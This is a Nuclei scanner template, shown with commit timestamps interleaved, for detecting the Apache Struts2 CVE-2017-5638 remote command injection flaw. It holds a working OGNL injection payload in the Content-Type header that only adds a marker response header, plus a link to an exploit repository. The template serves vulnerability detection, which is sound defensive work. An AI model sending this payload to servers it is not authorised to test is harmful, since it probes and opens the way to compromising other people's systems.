nuclei-templates/cves/2017/CVE-2017-5638.yaml

30 lines
1.1 KiB
YAML
Raw Normal View History

2021-01-02 05:02:50 +00:00
id: CVE-2017-5638
2020-08-19 13:13:31 +00:00
info:
author: "Random Robbie"
name: "Struts2 RCE "
severity: critical
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attackers invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
2020-08-19 13:13:31 +00:00
# This template supports the detection part only.
# Do not test any website without permission
2020-08-19 13:55:42 +00:00
# Exploit:- https://github.com/mazen160/struts-pwn
2020-08-19 13:13:31 +00:00
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
matchers:
- type: word
words:
2020-08-30 04:14:52 +00:00
- "X-Hacker: Bounty Plz"
part: header